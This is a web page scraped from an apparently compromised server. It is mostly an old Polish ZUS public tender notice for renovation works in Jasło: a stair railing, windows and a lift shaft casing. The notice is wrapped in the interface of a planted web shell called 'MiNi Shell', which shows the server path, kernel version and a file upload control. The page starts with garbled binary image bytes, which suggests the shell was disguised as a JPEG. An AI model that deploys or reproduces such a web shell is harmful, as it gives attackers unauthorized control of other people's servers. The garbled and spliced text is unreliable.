JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131009/209689-N-2013.html

<p class="kh_header"><b>Jasło: Wykonaie robót remontowych w budynku A Oddziału ZUS w Jaśle przy ul. Rynek 18B</b><br>
<b>Numer ogłoszenia: 209689 - 2013; data zamieszczenia: 09.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Jaśle , ul. Rynek 18b, 38-200 Jasło, woj. podkarpackie, tel. 0-13 4462917, 4484700 w. 108, faks 0-13 4462917.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonaie robót remontowych w budynku A Oddziału ZUS w Jaśle przy ul. Rynek 18B.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót remontowych    w budynku A Oddziału ZUS   w Jaśle przy ul. Rynek 18B:
Zadanie nr 1

Wymiana balustrady schodowej w budynku A Oddziału ZUS w Jaśle ilość   - 90,02 m
W zakres robót wchodzą:
- demontaż istniejącej balustrady
- dostawa i montaż balustrady schodowej wykonanej ze stali nierdzewnej ( satyna, szlifowana)  z profili kwadratowych (słupki i pochwyt) wypełnienie z 5 prętów 
- wykonanie ścianek działowych z płyt gipsowo-kartonowych na pojedynczych rusztach metalowych

Szczegółowo przedmiot zamówienia określają:
- przedmiar robót
- Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych
Rysunek - wygląd balustrady


Zadanie nr 2

Wymiana okien w pomieszczeniu składnicy akt nad stacją trafo w Jaśle ul. Rynek 18B   ilość  -5,42 m2
W zakres  robót wchodzą:
- demontaż istniejących okien drewnianych
- dostawa i montaż okien rozwieralno-uchylnych profil PCV

Szczegółowo przedmiot zamówienia określają:
- przedmiar robót
- Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych
Rysunek -  poglądowy podział okna i wymiary



Zadanie nr 3 
Roboty naprawcze - obudowa szybu windowego budynek A Oddział ZUS w Jaśle ilość       122,76 m2
W zakres robót wchodzą:
- wykonanie obudowy szybu windowego z blachy nierdzewnej o grubości 0,8 mm szczotkowanej, perforowanej otwory cylindryczne układ mieszany, wraz z  montażem elementów dekoracyjnych wykonanych z blachy malowanej proszkowo.

Szczegółowo przedmiot zamówienia określają:
- przedmiar robót
- Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych
Rysunki-  aranżacje obudowy konstrukcji szybu windowego


Wszystkie znaki towarowe, nazwy własne producentów lub inne, określające pochodzenie,   a występujące w przedmiarze robót służą jedynie opisowi przedmiotu zamówienia i nie należy traktować jako wymagane. Dopuszcza się przy realizacji zamówienia zastosowanie materiałów równoważnych o parametrach nie gorszych niż wskazane w opisie przedmiotu zamówienia.
Wykonawca wykona przedmiot zamówienia przy użyciu dostarczonych przez siebie materiałów odpowiadających wymogom wyrobów dopuszczonych do obrotu i stosowania  w budownictwie zgodnie z ustawą Prawo budowlane z dnia 16.04.2004r. o wyrobach budowlanych Wszystkie wbudowane materiały muszą być zgodne z wymaganiami określonymi w części szczegółowej Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych.
Zamawiający zaleca  dokonanie  wizji lokalnej obiektu przed sporządzeniem oferty  w godz. od 8.00 - 14.00 po wcześniejszym uzgodnieniu telefonicznym z p. Bartłomiejem Rysz w Wydziale Administracyjno- Gospodarczym  w godz. 7.30-15.30  tel. 134437965  ul. Rynek 18 b  nr pok. 111  bud. A..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.22.32.10-1, 45.11.11.00-9, 45.43.22.10-9, 45.43.21.00-5, 45.42.11.32-8, 45.22.32.10-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dla spełnienia warunku nie precyzuje żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (zał. nr 1do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony , jeśli Wykonawca wykaże, że  w ciągu ostatnich 5 lat przed  upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy -       w tym okresie , wykonał co najmniej jedną  robotę budowlaną której zakres obejmował:
 - dla zadania nr1: wykonanie i montaż  balustrad ze stali nierdzewnej, 
- dla zadania nr 2:  nie precyzuje się żadnych wymagań
- dla zadania nr 3:  wykonanie obudów lub fasad, obróbek, elementów ze stali nierdzewnej .
Zamawiający oceni spełnianie warunku na podstawie analizy załączonego do oferty wykazu robót budowlanych - dotyczy zadania 1 i zadania 3 -  ( zał. nr 3 do SIWZ) wraz z dowodami potwierdzającymi,  że wykazane roboty zostały wykonane w sposób należyty, zgodnie                  z zasadami sztuki budowlanej i prawidłowo ukończone oraz oświadczenia (zał. nr 1do SIWZ) 
Dla zadania 2 Zamawiający dla spełnienia warunku nie precyzuje żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (zał. nr 1do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dla spełnienia warunku nie precyzuje żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (zał. nr 1do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dla spełnienia warunku nie precyzuje żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (zał. nr 1do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dla spełnienia warunku nie precyzuje żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (zał. nr 1do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony Formularz oferty według wzoru stanowiącego Dział III SIWZ,
2. Wypełniony Formularz cenowy według wzoru stanowiącego Dział II SIWZ 
3. W przypadku osoby , osób  działających w imieniu Wykonawcy w oparciu o odrębnie udzielone pełnomocnictwo , w ofercie należy złożyć oryginał dokumentu potwierdzającego udzielenie tego pełnomocnictwa lub kopii poświadczonej  za zgodność z oryginałem przez osobę udzielającą pełnomocnictwa lub poświadczone  notarialnie .  Wykonawcy , którzy wspólnie będą ubiegać się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania  w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art.23ust.2 ustawy Prawo zamówień publicznych. 
W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie  o udzielenia zamówienia publicznego, dokumenty wymienione w pkt.powyżej składają Wykonawcy wspólnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonywania zmian postanowień zawartej umowy w przypadku, gdy konieczność wprowadzenia tych zmian wynika ze zmian przepisów prawa, w oparciu o które realizowana jest umowa, wystąpienia siły wyższej oraz zmian funkcjonalno-organizacyjnych stron mających wpływ na realizację przedmiotu zamówienia. 
Zamawiający dopuszcza możliwość dokonania zmian umowy w zakresie opisu przedmiotu zamówienia i jego cech oraz sposobu i terminu jego realizacji - jeżeli zmiany są korzystne dla Zamawiającego lub wywołane okolicznościami, których nie można było przewidzieć w momencie składnia oferty.
Z wnioskiem o zmianę postanowień  umowy może wystąpić zarówno  Wykonawca jak  i Zamawiający.
Zamawiający może wyrazić zgodę na zmiany osób reprezentujących Wykonawcę  z powodu :
1) rezygnacji,  zwolnienia ze stanowisk osób uprzednio upoważnionych do reprezentowania Wykonawcy,
2) przekształcenia Wykonawcy mającego charakter sukcesji generalnej ( całość majątku oraz wszelkie prawa i obowiązki Wykonawcy przechodzą na inny podmiot )  
3) naturalnych  np.  choroby ,  śmierci 
Okolicznościami stanowiącymi podstawę zmiany terminu realizacji umowy są:
1) zmiany będące następstwem okoliczności leżących po stronie zamawiającego,  w szczególności:
a)wstrzymanie realizacji umowy przez zamawiającego,
     2) konieczność wykonania części robót inną technologią niż założono w STWiOR albo  konieczność wykonania zamówień dodatkowych.
     3) przerwanie prac przez właściwe organy administracji rządowej lub samorządowej albo jako wykonanie prawomocnego orzeczenia sądu , za co nie można przypisać winy Wykonawcy.
Okolicznościami stanowiącymi podstawę do zmiany umowy  są:
1)  wydłużenie okresu gwarancji lub rękojmi,
2) konieczności zmiany osób przewidzianych do wykonania przedmiotu umowy -  o kwalifikacjach nie gorszych niż wskazane w SIWZ.
3)  wystąpienia obiektywnych zmian ocenianych jako korzystne dla Zamawiającego,
4) ze względu na zmianę obowiązujących przepisów wykonanie przedmiotu zamówienia lub jego części nie będzie możliwe,
5) Wykonawca w trakcie wykonania przedmiotu umowy może składać wnioski i propozycje zmiany sposobu wykonania przedmiotu zamówienia, które:
a)  zmniejszą koszty,
b)  poprawią jakość przedmiotu zamówienia,
c)  w  inny sposób dostarczą zamawiającemu pożytku.
Zamawiający przewiduje możliwość zmiany wysokości wynagrodzenia w następujących przypadkach:
1)gdy ilości rzeczywiście wykonanych robót określone w obmiarze będą różniły się od przewidywanych ilości robót określonych w przedmiarze,
2)gdy w przedmiarze, a w konsekwencji w kosztorysie ofertowym, zostaną pominięte roboty objęte przedmiotem zamówienia a ujęte w dokumentacji,
3)gdy w sytuacjach i na zasadach przewidzianych umową zostanie ograniczony przewidywany zakres robót objęty przedmiotem umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Ubezpieczeń Społecznych Oddział w Jaśle 38-200 Jasło ul. Rynek 18B pok.402 bud.A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.10.2013 godzina 10:00, miejsce: ZUS O/Jasło ul. Rynek 18B 38-200 Jasło pok.111 budynek A lub za pośrednictwem poczty na adres:ZUS O/Jasło ul. Rynek 18B 38-200 Jasło.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wymiana balustrady w budynku A O/ZUS w Jaśle.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiana balustrady schodowej w budynku A Oddziału ZUS w Jaśle ilość   - 90,02 m
W zakres robót wchodzą:
- demontaż istniejącej balustrady
- dostawa i montaż balustrady schodowej wykonanej ze stali nierdzewnej ( satyna, szlifowana)        z profili kwadratowych (słupki i pochwyt) wypełnienie z 5 prętów 
- wykonanie ścianek działowych z płyt gipsowo-kartonowych na pojedynczych rusztach metalowych

Szczegółowo przedmiot zamówienia określają:
- przedmiar robót
- Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych
Rysunek - wygląd balustrady.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.22.32.10-1, 45.11.11.00-9, 45.43.22.10-9, 45.43.21.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wymiana okien w pomieszczeniu składnicy akt nad stacja trafo w Jaśle ul. Rynek 18B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiana okien w pomieszczeniu składnicy akt nad stacją trafo w Jaśle ul. Rynek 18B   ilość  -5,42 m2
W zakres  robót wchodzą:
- demontaż istniejących okien drewnianych
- dostawa i montaż okien rozwieralno-uchylnych profil PCV

Szczegółowo przedmiot zamówienia określają:
- przedmiar robót
- Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych
Rysunek -  poglądowy podział okna i wymiary.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.32-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Roboty naprawcze - obudowa szybu windowego budynek A O/ZUS w Jaśle.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty naprawcze - obudowa szybu windowego budynek A Oddział ZUS w Jaśle ilość       122,76 m2
W zakres robót wchodzą:
- wykonanie obudowy szybu windowego z blachy nierdzewnej o grubości 0,8 mm szczotkowanej, perforowanej otwory cylindryczne układ mieszany, wraz z  montażem elementów dekoracyjnych wykonanych z blachy malowanej proszkowo.

Szczegółowo przedmiot zamówienia określają:
- przedmiar robót
- Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych
Rysunki-  aranżacje obudowy konstrukcji szybu windowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.22.32.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com